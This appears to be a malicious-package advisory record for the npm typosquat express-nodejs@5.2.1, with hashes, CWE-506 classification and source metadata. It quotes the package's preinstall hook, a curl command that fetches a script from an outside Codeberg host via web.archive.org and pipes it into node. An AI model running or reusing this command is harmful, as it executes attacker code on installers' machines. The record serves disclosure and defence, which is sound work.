-= Per source details. Do not edit below this line.=-
express-nodejs@5.2.1 typosquats the express framework: package.json copies express's description, author (TJ Holowaychuk), repository (expressjs/express), and homepage while publishing under a different name. The package.json preinstall lifecycle hook runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, piping a script fetched from an unrelated third-party Codeberg account (hellscripter/install-scripts) on a mutable branch, laundered through web.archive.org, directly into the node interpreter on the installer's host. This executes arbitrary attacker-controlled code at npm install time with no pinning, no integrity check, and no relationship to the express project. The fetched payload is mutable and its contents are not shipped in the tarball.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020631",
"import_time": "2026-09-29T14:44:37.348435315Z",
"modified_time": "2026-09-29T14:40:14Z",
"sha256": "9aea7dd76028cd443cf2f8d58fa5d8b3b28bb6db870f34d1cc6dad28db92fe93",
"source": "amazon-inspector",
"versions": [
"5.2.1"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "afa88132b139c981315a84389978151c8d9ab5bd2055a33783ed9d5b028ed6e0",
"tlsh": "ef51da21cc0e8c6326c5a6dd3c68a542616188078e41f81cf769539c8f8e52f71b9fbf"
}
],
"package_integrity": [
{
"filename": "express-nodejs-5.2.1.tgz",
"hashes": {
"sha1": "899321111bfd44358cc22ce991d32cb101203dff",
"sha512_sri": "sha512-919mTtdAxNkaV9vMheghnKi4nL/XSrbfsO5G3Ago43rzz7ct24hPzC/pWZVpBkQA4ogAbWPsxTyKeWYiIuwUGQ=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-nodejs/MAL-2026-17243.json"